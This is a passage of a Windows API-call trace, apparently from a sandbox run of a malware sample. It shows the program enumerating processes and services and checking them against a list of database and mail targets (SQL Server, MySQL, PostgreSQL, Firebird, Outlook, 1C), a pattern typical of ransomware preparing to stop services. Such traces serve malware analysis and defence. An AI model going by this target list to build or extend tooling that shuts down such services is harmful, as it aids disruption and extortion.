[0264.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.470] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.470] lstrlenW (lpString="wininit.exe") returned 11 [0264.470] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0264.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0264.470] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.471] lstrlenW (lpString="csrss.exe") returned 9 [0264.471] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0264.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0264.471] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0264.471] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0264.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0264.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0264.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0264.471] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.471] lstrlenW (lpString="winlogon.exe") returned 12 [0264.471] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0264.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0264.471] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.472] lstrlenW (lpString="services.exe") returned 12 [0264.472] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0264.472] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0264.472] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.472] lstrlenW (lpString="lsass.exe") returned 9 [0264.472] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0264.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0264.472] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0264.472] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0264.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0264.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0264.472] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0264.472] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0264.473] lstrlenW (lpString="lsm.exe") returned 7 [0264.473] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0264.473] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0264.473] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0264.473] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0264.473] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0264.473] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0264.473] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0264.473] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.473] lstrlenW (lpString="svchost.exe") returned 11 [0264.473] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.473] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.473] lstrlenW (lpString="svchost.exe") returned 11 [0264.473] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.473] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.474] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.474] lstrlenW (lpString="svchost.exe") returned 11 [0264.474] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.474] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.474] lstrlenW (lpString="svchost.exe") returned 11 [0264.474] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.474] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.475] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.475] lstrlenW (lpString="svchost.exe") returned 11 [0264.475] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.475] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.476] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.476] lstrlenW (lpString="audiodg.exe") returned 11 [0264.476] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0264.476] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0264.476] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0264.476] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0264.476] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0264.476] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0264.476] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0264.476] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.476] lstrlenW (lpString="svchost.exe") returned 11 [0264.476] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0264.476] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0264.476] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0264.477] lstrlenW (lpString="userinit.exe") returned 12 [0264.477] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0264.477] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0264.477] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.477] lstrlenW (lpString="explorer.exe") returned 12 [0264.477] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0264.477] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0264.477] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0264.477] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0264.477] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0264.477] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.478] lstrlenW (lpString="dwm.exe") returned 7 [0264.478] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.478] lstrlenW (lpString="svchost.exe") returned 11 [0264.478] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0264.478] lstrlenW (lpString="agent1c.exe") returned 11 [0264.478] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.479] lstrlenW (lpString="spoolsv.exe") returned 11 [0264.479] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0264.479] lstrlenW (lpString="reader_sl.exe") returned 13 [0264.479] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0264.479] lstrlenW (lpString="dllhost.exe") returned 11 [0264.479] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0264.479] lstrlenW (lpString="taskhost.exe") returned 12 [0264.480] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.480] lstrlenW (lpString="svchost.exe") returned 11 [0264.480] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0264.480] lstrlenW (lpString="cmd.exe") returned 7 [0264.480] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0264.480] lstrlenW (lpString="conhost.exe") returned 11 [0264.480] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0264.481] lstrlenW (lpString="mode.com") returned 8 [0264.481] Process32NextW (in: hSnapshot=0x130, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0264.481] CloseHandle (hObject=0x130) returned 1 [0264.481] Sleep (dwMilliseconds=0x1f4) [0265.223] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x587b20 [0265.281] EnumServicesStatusExW (in: hSCManager=0x587b20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0265.284] GetLastError () returned 0xea [0265.284] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa08) returned 0x598a58 [0265.284] EnumServicesStatusExW (in: hSCManager=0x587b20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x598a58, cbBufSize=0xa08, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x598a58, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0265.285] CloseServiceHandle (hSCObject=0x587b20) returned 1 [0265.291] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0265.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.291] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0265.291] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0265.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0265.291] lstrlenW (lpString="AudioSrv") returned 8 [0265.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0265.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0265.291] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0265.291] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0265.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0265.291] lstrlenW (lpString="BFE") returned 3 [0265.291] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0265.291] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0265.291] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0265.291] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0265.291] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0265.292] lstrlenW (lpString="CscService") returned 10 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0265.292] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0265.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0265.292] lstrlenW (lpString="DcomLaunch") returned 10 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0265.292] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0265.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0265.292] lstrlenW (lpString="Dhcp") returned 4 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0265.292] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0265.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0265.292] lstrlenW (lpString="Dnscache") returned 8 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0265.292] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0265.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0265.292] lstrlenW (lpString="eventlog") returned 8 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0265.292] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0265.292] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0265.292] lstrlenW (lpString="EventSystem") returned 11 [0265.292] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0265.292] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0265.292] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0265.293] lstrlenW (lpString="gpsvc") returned 5 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0265.293] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0265.293] lstrlenW (lpString="lmhosts") returned 7 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0265.293] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0265.293] lstrlenW (lpString="MMCSS") returned 5 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0265.293] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0265.293] lstrlenW (lpString="nsi") returned 3 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0265.293] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0265.293] lstrlenW (lpString="PlugPlay") returned 8 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0265.293] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0265.293] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0265.293] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0265.293] lstrlenW (lpString="Power") returned 5 [0265.293] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0265.293] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0265.294] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0265.294] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0265.294] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0265.294] lstrlenW (lpString="ProfSvc") returned 7 [0265.294] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0265.294] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0265.294] lstrcmpiW 